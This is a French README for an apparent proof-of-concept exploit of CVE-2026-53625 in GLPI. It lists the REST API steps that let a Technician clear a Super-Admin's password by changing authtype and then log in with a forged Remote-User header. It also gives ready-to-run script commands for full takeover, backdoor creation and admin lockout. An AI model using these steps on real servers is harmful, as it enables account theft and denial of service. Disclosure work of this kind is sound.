
PoC d'élévation de privilèges GLPI via la manipulation d'authtype - CVE-2026-53625. PoC éthique pour la vulnérabilité GLPI permettant à un Technicien de prendre le contrôle total de n'importe quel compte Super-Admin via la manipulation d'authtype par l'API REST.
Ce dépôt fournit une preuve de concept (PoC) éthique pour CVE-2026-53625, une vulnérabilité d'élévation de privilèges de sévérité Élevée dans GLPI affectant toutes les versions de 0.70 à 11.0.7.
Un utilisateur à faibles privilèges (Technicien) peut prendre le contrôle total de n'importe quel compte, y compris
Super-Admin, en manipulant le champ authtype via l'API REST.
L'attaque enchaîne trois faiblesses pour réaliser une prise de contrôle complète du compte avec
création d'une porte dérobée persistante.
Avis officiel : GHSA-94rp-v9f2-5rj7
GLPI ne vérifie pas les niveaux de privilèges lorsqu'un utilisateur met à jour le dossier d'un autre utilisateur via
l'API REST. Le champ authtype n'est pas protégé, et le passer à
EXTERNAL amène GLPI à vider automatiquement le mot de passe de la victime.
Combiné à un en-tête SSO forgable (Remote-User), cela permet une prise de contrôle
complète du compte.
POST /apirest.php/initSession)
GET /apirest.php/User)
authtype de la victime en EXTERNAL (4) via
PUT /apirest.php/User/{id} — GLPI vide le mot de passe automatiquement
(User.php:1277)
Remote-User: {victime} pour obtenir une session
en tant que la victime — aucun mot de passe requis
Sans SSO configuré : l'attaque fonctionne toujours comme un DoS — le mot de passe de la victime est vidé et elle est verrouillée. Aucun SSO requis pour cet impact.
Ce PoC est uniquement destiné à des fins éducatives et de tests autorisés. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite. L'auteur et les contributeurs ne sont pas responsables d'une mauvaise utilisation.
Cloner le dépôt :
git clone https://github.com/7h30th3r0n3/CVE-2026-53625-GLPI-PoC.git
cd CVE-2026-53625-GLPI-PoC
Dépendances : bash, curl, python3, openssl
Le PoC prend en charge deux modes d'attaque :
# Chaîne de prise de contrôle complète (par défaut) — nécessite un SSO avec en-tête forgable :
./poc_authtype_takeover.sh --auto http://glpi.local tech P@ss
# DoS uniquement — verrouiller l'admin, aucun SSO requis :
./poc_authtype_takeover.sh --lockdown --auto http://glpi.local tech P@ss
# Mode sûr — prouver la chaîne sur un utilisateur sacrificiel, zéro impact sur les vrais comptes :
./poc_authtype_takeover.sh --safe --verbose http://glpi.local tech P@ss
# Prise de contrôle complète + restauration de la victime ensuite :
./poc_authtype_takeover.sh --backdoor --restore --restore-pass 'NewPass!' --auto http://glpi.local tech P@ss
Exécutez ./poc_authtype_takeover.sh --help pour toutes les options.
Vulnérabilité découverte et PoC développé par 7h30th3r0n3.